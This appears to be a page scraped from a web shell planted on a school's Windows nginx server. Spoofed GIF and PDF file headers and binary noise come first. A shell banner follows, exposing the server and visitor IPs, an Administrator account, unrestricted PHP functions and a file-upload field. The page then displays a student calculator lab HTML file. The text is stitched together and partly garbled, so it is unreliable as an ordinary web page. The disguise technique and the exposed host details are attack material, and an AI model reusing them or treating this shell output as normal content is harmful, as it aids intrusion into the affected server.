GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.119 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /nginx/html/JimMartinson/CST1022/Resources/Week/05/ |
Upload File : |
<!DOCTYPE html> <html lang="en"> <head> <title>Lab 2 - replace_with_your_name</title> <meta charset="utf-8"> <link href="Lab02.css" rel="stylesheet"> <script src="Lab02.js"></script> </head> <body> <h1>Lab 2 - replace_with_your_name</h1> <div id="calculatorContainer"> <img id="calculatorImage" src="calculator.png" alt="Calculator" usemap="#calculatorMap" width="590" height="661"> <map name='calculatorMap'> <!-- col 1 --> <area href="#" onclick="return areaClicked(this);" title="MRC" shape='rect' coords='31,220,123,286' tabindex="1"> <area href="#" onclick="return areaClicked(this);" title="7" shape='rect' coords='31,305,123,371' tabindex="2"> <area href="#" onclick="return areaClicked(this);" title="4" shape='rect' coords='31,390,123,455' tabindex="3"> <area href="#" onclick="return areaClicked(this);" title="1" shape='rect' coords='31,474,123,540' tabindex="4"> <area href="#" onclick="return areaClicked(this);" title="0" shape='rect' coords='31,559,123,625' tabindex="5"> <!-- col 2 --> <area href="#" onclick="return areaClicked(this);" title="M-" shape='rect' coords='141,220,231,286' tabindex="6"> <area href="#" onclick="return areaClicked(this);" title="8" shape='rect' coords='141,305,231,371' tabindex="7"> <area href="#" onclick="return areaClicked(this);" title="5" shape='rect' coords='141,390,231,455' tabindex="8"> <area href="#" onclick="return areaClicked(this);" title="2" shape='rect' coords='141,474,231,540' tabindex="9"> <area href="#" onclick="return areaClicked(this);" title="00" shape='rect' coords='141,559,231,625' tabindex="10"> <!-- col 3 --> <area href="#" onclick="return areaClicked(this);" title="M+" shape='rect' coords='251,220,342,286' tabindex="11"> <area href="#" onclick="return areaClicked(this);" title="9" shape='rect' coords='251,305,342,371' tabindex="12"> <area href="#" onclick="return areaClicked(this);" title="6" shape='rect' coords='251,390,342,455' tabindex="13"> <area href="#" onclick="return areaClicked(this);" title="3" shape='rect' coords='251,474,342,540' tabindex="14"> <area href="#" onclick="return areaClicked(this);" title="." shape='rect' coords='251,559,342,625' tabindex="15"> <!-- col 4 --> <area href="#" onclick="return areaClicked(this);" title="+/-" shape='rect' coords='360,220,451,286' tabindex="16"> <area href="#" onclick="return areaClicked(this);" title="%" shape='rect' coords='360,305,451,371' tabindex="17"> <area href="#" onclick="return areaClicked(this);" title="+" shape='rect' coords='360,390,451,455' tabindex="18"> <area href="#" onclick="return areaClicked(this);" title="x" shape='rect' coords='360,475,451,541' tabindex="19"> <area href="#" onclick="return areaClicked(this);" title="-" shape='rect' coords='360,559,451,625' tabindex="20"> <!-- col 5 --> <area href="#" onclick="return areaClicked(this);" title="on" shape='rect' coords='470,220,562,286' tabindex="21"> <area href="#" onclick="return areaClicked(this);" title="arr" shape='rect' coords='470,305,562,371' tabindex="22"> <area href="#" onclick="return areaClicked(this);" title="/" shape='rect' coords='470,390,562,455' tabindex="23"> <area href="#" onclick="return areaClicked(this);" title="=" shape='rect' coords='470,474,562,624' tabindex="24"> </map> <div id="calculatorDisplay"></div> </div><!-- calculatorContainer --> <script> _Initialize(); </script> </body> </html>